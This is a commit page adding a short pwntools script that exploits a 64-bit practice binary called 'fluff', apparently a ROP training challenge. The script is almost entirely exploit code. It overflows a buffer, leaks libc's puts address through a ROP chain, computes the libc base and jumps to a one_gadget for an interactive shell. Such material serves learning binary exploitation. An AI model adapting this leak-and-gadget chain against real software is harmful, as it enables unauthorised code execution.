exploit for 64-bit fluff binary

AravGarg · Mar 28, 2020 · 760af75 · 760af75
1 parent f9540a2
commit 760af75
Showing 1 changed file with 33 additions and 0 deletions.
diff --git a/fluff64.py b/fluff64.py
@@ -0,0 +1,33 @@
+from pwn import *
+target=process('./fluff')
+elf=ELF('./fluff')
+libc=elf.libc
+
+print(target.recvuntil("...\n> "))
+payload="A"*40
+
+puts_plt=0x4005d0
+puts_got=0x601018
+poprdi=0x4008c3
+pwnme=0x4007b5
+one_gadget=0xe652b
+
+payload+=p64(poprdi)
+payload+=p64(puts_got)
+payload+=p64(puts_plt)
+payload+=p64(pwnme)
+payload+=p64(0x0)
+
+target.sendline(payload)
+
+leak=target.recvuntil("\x0a").strip("\x0a")
+libc_puts=u64(leak+"\x00"*(8-len(leak)))
+libc_base=libc_puts-libc.symbols["puts"]
+print(hex(libc_base))
+libc_gadget=libc_base+one_gadget
+
+payload="A"*40
+payload+=p64(libc_gadget)
+
+target.sendline(payload)
+target.interactive()